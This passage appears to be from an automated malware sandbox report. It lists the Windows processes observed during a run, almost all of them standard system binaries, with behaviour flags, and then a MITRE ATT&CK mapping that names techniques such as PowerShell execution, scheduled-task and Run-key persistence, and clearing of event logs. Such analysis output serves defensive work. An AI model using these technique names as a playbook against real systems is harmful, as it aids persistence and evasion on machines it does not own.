C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4508

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 4910aa29b74c074322d75d292461a160 xx6paZg72UCTdU9wpsNsPA.0.1.0.0.0
1⤵
- Sets service image path in registry
PID:3180
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:3060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3212

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:1936

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:3472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
PID:5480

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:5664

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:4512

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:2496

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:5320

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:3620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:5360

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2936

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:756

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\1f3fe60b5fc8432dbc7bb9b45e4e6ae5 /t 3336 /p 3332
1⤵
PID:8584

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:11320

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:12032

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:10068

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:14196

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:7932

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:8392

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3460

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:6408

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:7424

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:14308

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:14620

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:4120

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
PID:13024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:14992

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\317ddf9f99b74a6d8cb4749db9983149 /t 8020 /p 12540
1⤵
PID:6624

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:12500

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:5224

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery